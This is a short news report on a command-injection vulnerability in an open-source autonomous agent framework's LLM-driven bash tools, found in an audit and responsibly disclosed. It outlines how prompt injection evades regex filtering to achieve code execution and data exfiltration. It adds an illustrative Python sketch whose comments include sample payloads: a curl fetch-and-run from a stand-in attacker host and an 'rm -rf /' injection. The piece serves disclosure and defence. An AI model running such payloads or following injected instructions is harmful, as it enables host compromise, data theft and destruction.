Gate News: On March 16, the China Academy of Information and Communications Technology (CAICT), together with a joint team from Shanghai Jiao Tong University and Nanjing University, conducted a security audit of OpenClaw, an open-source autonomous agent framework, and discovered a high-risk command injection vulnerability in its LLM-driven bash-tools module. The flaw stems from the system failing to properly escape command-line arguments generated by large language models (LLMs): an attacker can craft prompt-injection inputs that bypass the regex-based input filtering, achieving remote code execution on the host machine and exfiltration of sensitive data. The research team verified the attack across multiple mainstream model environments, initiated a responsible vulnerability disclosure process, and submitted remediation recommendations to the NVDB AI Product Security Vulnerability Database (CAIVD) and the GitHub community.
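To illustrate the class of flaw described above, here is a minimal, hypothetical sketch in Python. The function names and the `grep` command are illustrative assumptions, not OpenClaw's actual code; the point is the contrast between splicing an unescaped model-generated argument into a shell string and quoting it first.

```python
import shlex

def build_command_unsafe(llm_arg: str) -> str:
    # Vulnerable pattern: the model-generated argument is interpolated
    # into a shell string without escaping. A payload such as
    # "x; curl attacker.example | sh" terminates the intended grep
    # invocation and starts an attacker-controlled command.
    return f"grep {llm_arg} /var/log/app.log"

def build_command_safe(llm_arg: str) -> str:
    # Mitigation: shlex.quote() wraps the argument so the shell treats
    # it as one literal word, neutralizing metacharacters like ';'.
    return f"grep {shlex.quote(llm_arg)} /var/log/app.log"

payload = "foo; rm -rf /"
print(build_command_unsafe(payload))  # the ';' starts a second command
print(build_command_safe(payload))    # payload stays one quoted argument
```

An even stronger mitigation is to avoid the shell entirely, e.g. `subprocess.run(["grep", llm_arg, "/var/log/app.log"])`, so the argument is never re-parsed by a shell at all.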